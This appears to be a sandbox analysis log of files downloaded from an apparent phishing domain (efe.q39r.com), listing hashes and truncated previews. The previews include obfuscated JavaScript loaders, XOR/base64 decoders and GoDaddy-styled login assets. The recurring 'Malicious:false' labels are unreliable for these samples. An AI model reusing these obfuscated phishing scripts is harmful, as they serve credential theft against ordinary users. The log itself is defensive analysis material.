                                SHA-512:AAEB2961C7F93B8DF2600068C48706920D0DA1E1C2C925FBDFBED10E33120B05C9722ECBB63C6B3DD534D664CFB5F183CCF850591BBB78DAA89E0A3F637A450C
                                Malicious:false
                                Reputation:unknown
                                URL:https://efe.q39r.com/34BHD2b3T7x95tzZHQQxch3lP0OklAvEnCb8sEppzXY67110
                                Preview:const _0x3c0b69=_0x40bd;(function(_0x1ffa3e,_0x743a4f){const _0x1f38a8=_0x40bd,_0x2d88b6=_0x1ffa3e();while(!![]){try{const _0x461944=-parseInt(_0x1f38a8(0x20b))/0x1+parseInt(_0x1f38a8(0x319))/0x2*(parseInt(_0x1f38a8(0x2d0))/0x3)+parseInt(_0x1f38a8(0x2c7))/0x4*(parseInt(_0x1f38a8(0x281))/0x5)+parseInt(_0x1f38a8(0x21b))/0x6+-parseInt(_0x1f38a8(0x34b))/0x7+parseInt(_0x1f38a8(0x1d9))/0x8+parseInt(_0x1f38a8(0x245))/0x9*(-parseInt(_0x1f38a8(0x2ac))/0xa);if(_0x461944===_0x743a4f)break;else _0x2d88b6['push'](_0x2d88b6['shift']());}catch(_0xf1881c){_0x2d88b6['push'](_0x2d88b6['shift']());}}}(_0x4624,0xa135c));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;!document[_0x3c0b69(0x2ff)](_0x3c0b69(0x332))[_0x3c0b69(0x2df)][_0x3c0b69(0x2e1)](_0x3c0b69(0x1e7))&&(view=_0x3c0b69(0x2c8));document['getElementById'](_0x3c0b69(0x2a8))&&!document[_0x3c0b69(0x2ff)](_0x3c0b69(0x2a8))['classList'][_0x3c0b69(0x2e1)](_0x3c0b69(0x1e7))&&(view='uname_pdf');document[_0x3c0b69(0x326)](_0x3
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (1222), with no line terminators
                                Category:downloaded
                                Size (bytes):1222
                                Entropy (8bit):5.818804287152988
                                Encrypted:false
                                SSDEEP:
                                MD5:463D838587C8B5873CB6E4E942B770C9
                                SHA1:E69DCF383A6F3F51F123CA2D86F19FC4BE09E612
                                SHA-256:1448EC1B3F30A554233BD280AA99A7EAF690D1098647E7DDDEA286C757884F9C
                                SHA-512:F02DE64A37B90492D714CC7D132C49BF29CB5117CA945258BAF5B36D087A3A2AED165C6FF37D2ED4E4F10D7199AFB9C2B5E2555BA1BECA1A8D3AE133F4DF4B23
                                Malicious:false
                                Reputation:unknown
                                URL:https://www.google.com/recaptcha/api.js
                                Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-0lJkOVHDy3ItYlCbUoEzThjP3hLhLYfEFPAkVOCx
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 1115 x 700, 8-bit/color RGB, non-interlaced
                                Category:downloaded
                                Size (bytes):79750
                                Entropy (8bit):7.954235362439607
                                Encrypted:false
                                SSDEEP:
                                MD5:ACAF77D5AC2A60843A177E3D0581CC1E
                                SHA1:E0311D76E36490BFC9EB94FCB76B2811247F07D7
                                SHA-256:D16BE881B067A5038E9AB84AAA56C49D8B712CBA0FD5F7FA15C0AF06605DBF8A
                                SHA-512:5CA473F340BC9CC224205C71D262DDC24B0A660E650B29337CEF11538E96BA2B4374556DAC3ACB3D6BA085D8B0E1B03400FB20C316C7DBB06EE019C17C73F860
                                Malicious:false
                                Reputation:unknown
                                URL:https://efe.q39r.com/pqN0n6xyqF79DUkCI7M5jl9tDKtEGk7pgARpCNYtBFhWI8elPUjiKnPg6xbU56pAvCsKa9JTS9xki1R25sMSS07y1IM8wpjxngXQtaFGop420
                                Preview:.PNG........IHDR...[..........S'_....iCCPicc....c``<...,....y%EA.N...Q.............p...o. j/..Q..p...'...@.R...h...-..ak..I....]^RP.d...E!A.@v......NBb'.......6.9...w3....i. .a(f.bpgp....$.....W...........[..$n!.T.00.00l;..C.IAbQ"X........>-g`..d`..........nS...!....r.R."..y...z@.....!.....??....... cHRM..z&..............u0...`..:....p..Q<....bKGD.............=zTXtRaw profile type icc..(..S.. ....-..$.$$H......l..... 9f..L..9.*X4@E..&......l...d....h'.:.4*....FV\5\.w..W..e...b...(#....}/4..qLg.-...3....D.......Q..&.x...t./.p...L.}.&...qz.U....0[q....{..x...ZVlD.J..xL.e..fIz..z........Z.4.'.:/p........?..TG;.k..]ZE.....<...`..o....w.3-c.W..T.I......c..CNN....^.g.(......orNT..w.....IDATx....r..5.9...n.>aG.a_...wt^u..j....Y...nI-i...|...D....gV~....?.#......... ..w....'......}yk.Z ............?.......?...._....x..|............7'.-.Zk........o|...JR...Y.._...w..~dZk...Zk.?f.....?.@...b.{........i......Zk......rA.v._......e.[...Zk.......j...Zk.......9..W...
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with no line terminators
                                Category:downloaded
                                Size (bytes):76
                                Entropy (8bit):4.631455882779888
                                Encrypted:false
                                SSDEEP:
                                MD5:55D6D0CAE462E2BC690BC8AF45985B15
                                SHA1:0AD644096680FB01BFD9AF1CFE5F6E68911EA01F
                                SHA-256:2E5AE61757DB10E0E3770407B68ADE329068C840070A02F119C9EBE296194043
                                SHA-512:A929EE066B9150F1DC864A38FC1BF7D1F69B560CF6C123C0709EC983581B0B5F37360B3F318CA78EC9A3755C592A2928FA882CB34F160381ADA5A148B0786BCA
                                Malicious:false
                                Reputation:unknown
                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISMwlCs-GO0pB33BIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ3QAkDsEgUNqF3jdA==?alt=proto
                                Preview:CjYKBw3PIyr/GgAKBw3Fk8QkGgAKBw2JpWfLGgAKBw3DGTmQGgAKBw3QAkDsGgAKBw2oXeN0GgA=
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:HTML document, ASCII text, with very long lines (59569), with CRLF line terminators
                                Category:downloaded
                                Size (bytes):59936
                                Entropy (8bit):5.619023345834799
                                Encrypted:false
                                SSDEEP:
                                MD5:901C9785BCCFAAF719B47C39991D658E
                                SHA1:BFABC748605192297CF494F73A3A0EC1E81988E0
                                SHA-256:597FEEEC707D23130BE01230E0163A6A3B59BE76C2D714AD62CF6981C271E317
                                SHA-512:34B9A30C012E3D2D8C0FE09268CDCF907D2680264413AA57D72F2FCF64DE7B5321F7D755D62AF89F0F190C042B015D916285B8AC7594A82D816C089BB015FA29
                                Malicious:false
                                Reputation:unknown
                                URL:https://efe.q39r.com/vBFrwDlCFyGSZzoGqbIEYKNSlAdRVETLHFOHSQOBAOLLEGURWSIPNWFSNVJTBUFDMUAJBIMAVKNSUQWQZIUW?uoVHeQLIuYWqQmQZQWumqgEYavHSYRACAQZRQSJYVFXTPFFOHUVREWEUTJTRDLHZLYOOCY
                                Preview:<script>..function txMBhdCwFA(tcwfNiHSDZ, QgKKfnCQEg) {..let SILmOgqDxW = '';..tcwfNiHSDZ = atob(tcwfNiHSDZ);..let xnUKkxszSp = QgKKfnCQEg.length;..for (let i = 0; i < tcwfNiHSDZ.length; i++) {.. SILmOgqDxW += String.fromCharCode(tcwfNiHSDZ.charCodeAt(i) ^ QgKKfnCQEg.charCodeAt(i % xnUKkxszSp));..}..return SILmOgqDxW;..}..var xkBkeavVXo = txMBhdCwFA(`SEcQH3EAPDUqSxwSOTwMWW9ZBx8ZCnQ8UzoCWE0OGkRqXThoDQAOD0prXnASdEVZHAgGDyQkEicXBlJJHBIgIEFuSkoMBBADejpDIQAXFkUXCTl/WCUQAB0SWVV6ZhxkSwgGBVoMJ3IMaEoWDBkdFiBuP15FRU9LSBU3IlskEUUcGRdbdjhGIBUWVURbBTA+HCcKBgQOAEg9Px1gS1NBW1sVOzNZMRFLBgRaCz0+HD4WR1FXWxU3IlskEVtiYVRGdHAOJwYXBhsARiciUWlHDRsfBBVufx0jEhJBDBsJMzxXegYKAkQGAzcxQiAGDQ5EFRY9flgnR1tTRAcFJjlCIFtoZUtURnRsXj0LDk8ZEQppckEgHAkKGBwDMSQQdA0XCg1JRHtjBgMqNikPFgIsZnY5LCNYBhUEPRFYbFxXX0lKa15wEnRFWQMCGg10Ilc4WEccHw0KMSNaMQARTUscFDE2D3ZKBA0BM19hHWYyKBYlGQcNZTUHMQNXWElKa15wEnRFWQMCGg10Ilc4WEcfGREKOzFWdkUNHQ4SW3YgQzEtFw1cIj87Z0QtHz0rHAxVYnISNRZYTQ0bCCByEiAcFQpWVgA7PkZ7EgoJDUZEdDNAOxYWABkdAT0+D3YECwAFDQs7
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                Category:downloaded
                                Size (bytes):35970
                                Entropy (8bit):7.989503040923577
                                Encrypted:false
                                SSDEEP:
                                MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                Malicious:false
                                Reputation:unknown
                                URL:https://efe.q39r.com/1254MG8A4V38T78WCWCqr50
                                Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                Category:downloaded
                                Size (bytes):28584
                                Entropy (8bit):7.992563951996154
                                Encrypted:true
                                SSDEEP:
                                MD5:17081510F3A6F2F619EC8C6F244523C7
                                SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                Malicious:false
                                Reputation:unknown
                                URL:https://efe.q39r.com/78XkohjMha23tx8lBcgst60
                                Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (23398), with no line terminators
                                Category:downloaded
                                Size (bytes):23398
                                Entropy (8bit):5.104409455331282
                                Encrypted:false
                                SSDEEP:
                                MD5:C1C51D30D5E7094136F2D828349E520F
                                SHA1:10AE8971AD7A8798BC9732707FE4896B57541557
                                SHA-256:0C55057782E3B346C2B819574BFA916852BC8AC5BB4E01D56E8FBFFC22043C98
                                SHA-512:7CF90E58A309B53DB53570129780E0ABCEFA2802C1A6441C1A4B49DC265DF617220DC1072CEBDAE7A74C3CA85F5D87B606503BD48A60E049372BE5CAF39969F7
                                Malicious:false
                                Reputation:unknown
                                URL:https://efe.q39r.com/34WOSFdbdx6DmIF7mabiAj8920
                                Preview:*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:#fff;text-deco
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (1437), with CRLF line terminators
                                Category:downloaded
                                Size (bytes):38221
                                Entropy (8bit):5.115226983536052
                                Encrypted:false
                                SSDEEP:
                                MD5:FBE2FCF4596B299453C91B7231BA7427
                                SHA1:743291EE60A551E043529AFDC9E3FBE72D70E776
                                SHA-256:2DE22B4CDEDCBEB9CD5F63EA7A0DF8F77D0EF9086D200B052BFA9EE949DEED40
                                SHA-512:15CA09CD5754927D77B2CC9B74356585C5A1DD934ECF25B613F47964236A739DA8BE389999DE1AEEE7BDF8FA12FCBB07EEFF49E0EA80BA87AC786606DE74774F
                                Malicious:false
                                Reputation:unknown
                                URL:https://efe.q39r.com/abjG95MTfMsJrsk1e5ef27
                                Preview:@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web8/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/web8/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight: 700;src: url('/web8/ass
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:HTML document, ASCII text, with very long lines (1445), with CRLF line terminators
                                Category:downloaded
                                Size (bytes):1812
                                Entropy (8bit):6.044446799273298
                                Encrypted:false
                                SSDEEP:
                                MD5:ACB72706B2E2B6397C95248C859F83A4
                                SHA1:5FEF4A327015EEB22AA2C1109716CB288AC32A72
                                SHA-256:62EC374A62170E034810C8A683ADEF73B6EA08AD8EDDB0A89A4DF724134CA65D
                                SHA-512:0C64FB7BC4F2048DD4E74998C712A31449600B129EAACD89D0C479E979173A749A881469D883E5E25DBF6838CB3B9CF6F10BBC9B2A4804A039288B9FDF40A7BB
                                Malicious:false
                                Reputation:unknown
                                URL:https://efe.q39r.com/efe/
                                Preview:<script>..function lVopocCmMP(cYSBXvwcIM, diznQIZRCp) {..let fKPAwmdynM = '';..cYSBXvwcIM = atob(cYSBXvwcIM);..let mBGMUuvcKU = diznQIZRCp.length;..for (let i = 0; i < cYSBXvwcIM.length; i++) {.. fKPAwmdynM += String.fromCharCode(cYSBXvwcIM.charCodeAt(i) ^ diznQIZRCp.charCodeAt(i % mBGMUuvcKU));..}..return fKPAwmdynM;..}..var ZCiTjNfEIc = lVopocCmMP(`ZTAhOy00RXd6Yy8iMGkhJXIcOwEzCAEGZHkRPh4HPSw1ZygrUigDADYtbCElN1lnBBw7MDY7bHUYcnpjPzYsKjAtXidXMTMmCR8HL3YwPUEuDgcfJxVhHgMRcGM5RE5kEWlXHSs6YjJJThFpV0l5Y2JpNiFFPAUHeSE2JiVsUD0YC3E0DwwSJ2AZIB0hamtpeXkRPjosDyATGRMwSXJ6Y3ljYmk5ZFIoAwoxY2osNjYYaQxkU2NiaWRkEWlXGzw3NzsqZFcoGxo8eE9DZGQRaQpkUz5PQy0iGSwWKgwPKiMPB35pSlR5YWBgP0k7aVdJeTQrJyArRmcbBjoiNiArKh8hBQw/Y39pMy1fLRgedy8tKiUwWCYZRykiNiEqJVwsV0J5YX1rZG8RaydLYk5INElOWC9fDDgAFwUsLnoKOEl4fn9pZmYYMnpjeWNiaS0iEWEvAzwIFAovA0gDXww4ABcFLC56CjhAcGM5RE5kEWlXHzgxYg0gBWQsOj4WJRNpeWRQPRgLcSYjChEIWSM8KhZqeUROZBFpVx84MWIoBhZ0HBIgAwAuaXlkGQ0TKAwmDx4LImBnGggtICpha2xqFQBHdB5pCR8lHDM2RANzb3BqaWxiK0cCIm8zBWlreVpQBDhw
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:SVG Scalable Vector Graphics image
                                Category:downloaded
                                Size (bytes):7390
                                Entropy (8bit):4.02755241095864
                                Encrypted:false
                                SSDEEP:
                                MD5:B59C16CA9BF156438A8A96D45E33DB64
                                SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                Malicious:false
                                Reputation:unknown
                                URL:https://efe.q39r.com/iji10Nq8tZCggWFn0p3yzHgKji06bGxPpxPh0rh778170
                                Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:SVG Scalable Vector Graphics image
                                Category:dropped
                                Size (bytes):270
                                Entropy (8bit):4.840496990713235
                                Encrypted:false
                                SSDEEP:
                                MD5:40EB39126300B56BF66C20EE75B54093
                                SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                Malicious:false
                                Reputation:unknown
                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):33
                                Entropy (8bit):4.06667707370723
                                Encrypted:false
                                SSDEEP:
                                MD5:6E311A109C6AC4B9C5D73A4D4CD12813
                                SHA1:CEC3F1BC64A7C2A484835D4796DF661BA48F7F5D
                                SHA-256:F0F3741D3611B7481793B25B7269FEFC970008A32EBEDA9F61804EECEC32A97B
                                SHA-512:9F51F5FA88741102F1115DC0165FFB1C4DC3B1B85645BBE7A05D22ABC7657F7110AFF07566FF85BDC9F5E49D4B3C4A68953855F3F2B9C84893D288CF9CC1022C
                                Malicious:false
                                Reputation:unknown
                                Preview:{. "origin": "185.152.66.230".}.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):231
                                Entropy (8bit):6.725074433303473
                                Encrypted:false
                                SSDEEP:
                                MD5:547988BAC5584B4608466D761E16F370
                                SHA1:C11BB71049702528402A31027F200184910A7E23
                                SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                Malicious:false
                                Reputation:unknown
                                Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (42414)
                                Category:downloaded
                                Size (bytes):42415
                                Entropy (8bit):5.374174676958316
                                Encrypted:false
                                SSDEEP:
                                MD5:F94A2211CE789A95A7C67E8C660D63E8
                                SHA1:F1FC19B6BCB96D0A905BF3192AAFF0885FF9F36F
                                SHA-256:926DC3302F99EC05E4206E965DDEB7250F5910A8C38E82C7BEAFB724BBAAF37B
                                SHA-512:EAC0FC89C2D6CCEB9F4C18DFC610DFF8BC194D3994F0C74B3D991F8423C6DADE11D805E76124596521C58AFA9939B45D2D3157F0A48626E12548020FC38364D3
                                Malicious:false
                                Reputation:unknown
                                URL:https://challenges.cloudflare.com/turnstile/v0/b/471dc2adc340/api.js?render=explicit
                                Preview:"use strict";(function(){function bt(e,r,t,o,u,s,m){try{var b=e[s](m),h=b.value}catch(d){t(d);return}b.done?r(h):Promise.resolve(h).then(o,u)}function Et(e){return function(){var r=this,t=arguments;return new Promise(function(o,u){var s=e.apply(r,t);function m(h){bt(s,o,u,m,b,"next",h)}function b(h){bt(s,o,u,m,b,"throw",h)}m(void 0)})}}function M(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):M(e,r)}function Ie(e,r,t){return r in e?Object.defineProperty(e,r,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[r]=t,e}function Ve(e){for(var r=1;r<arguments.length;r++){var t=arguments[r]!=null?arguments[r]:{},o=Object.keys(t);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(t).filter(function(u){return Object.getOwnPropertyDescriptor(t,u).enumerable}))),o.forEach(function(u){Ie(e,u,t[u])})}return e}function fr(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:HTML document, ASCII text
                                Category:downloaded
                                Size (bytes):315
                                Entropy (8bit):5.0572271090563765
                                Encrypted:false
                                SSDEEP:
                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                Malicious:false
                                Reputation:unknown
                                URL:https://sanemedia.ca/favicon.ico
                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                Category:downloaded
                                Size (bytes):93276
                                Entropy (8bit):7.997636438159837
                                Encrypted:true
                                SSDEEP:
                                MD5:BCD7983EA5AA57C55F6758B4977983CB
                                SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                Malicious:false
                                Reputation:unknown
                                URL:https://efe.q39r.com/ef13oAQRj2j1gM81Ug34dnnBtsym6kVTsZkl92
                                Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                Category:downloaded
                                Size (bytes):36696
                                Entropy (8bit):7.988666025644622
                                Encrypted:false
                                SSDEEP:
